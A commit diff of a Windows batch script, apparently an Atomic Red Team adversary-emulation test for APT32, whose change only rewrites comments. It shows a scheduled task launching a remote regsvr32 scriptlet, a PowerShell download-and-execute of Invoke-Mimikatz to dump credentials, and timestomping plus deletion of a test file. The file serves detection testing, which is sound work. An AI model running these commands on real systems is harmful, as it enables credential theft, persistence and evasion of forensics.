parent
4d7aeb8286
commit
29698b6131
|
@ -1,21 +1,32 @@
|
||||||
:: https://attack.mitre.org/wiki/Group/G0050
|
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
|
||||||
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
||||||
:: Thanks to Nick Carr for his research on this group
|
:: Thanks to Nick Carr for his research on this group
|
||||||
:: Sample Representation of ATT&CK Techniques used by APT32
|
:: Sample Representation of ATT&CK Techniques used by APT32
|
||||||
:: Tactics: Execution, Persistence, Privilege Escalation
|
:: Tactics: Execution, Persistence, Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
:: Tactic: Privilege Escalation / Execution
|
||||||
|
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
|
||||||
:: Create Scheduled Task With RegSv32 Payload
|
:: Create Scheduled Task With RegSv32 Payload
|
||||||
:: https://attack.mitre.org/wiki/Technique/T1053
|
|
||||||
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
|
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
|
||||||
|
|
||||||
SCHTASKS /Delete /TN "Atomic Testing" /F
|
SCHTASKS /Delete /TN "Atomic Testing" /F
|
||||||
|
|
||||||
:: Tactics: Execution
|
:: Tactics: Execution
|
||||||
:: https://attack.mitre.org/wiki/Technique/T1086
|
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
|
||||||
|
|
||||||
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||||
|
|
||||||
:: Tactics: Defense Evasion
|
:: Tactics: Defense Evasion
|
||||||
:: https://attack.mitre.org/wiki/Technique/T1099
|
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
|
||||||
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
||||||
|
|
||||||
echo "Atomic Test File" > test.txt
|
echo "Atomic Test File" > test.txt
|
||||||
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
||||||
|
|
||||||
:: Tactics: Defense Evasion
|
:: Tactics: Defense Evasion
|
||||||
:: https://attack.mitre.org/wiki/Technique/T1107
|
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
|
||||||
|
|
||||||
:: Deletes File, detection here would be File Modificaiton
|
:: Deletes File, detection here would be File Modificaiton
|
||||||
del test.txt
|
del test.txt
|
||||||
|
|
Loading…
Reference in New Issue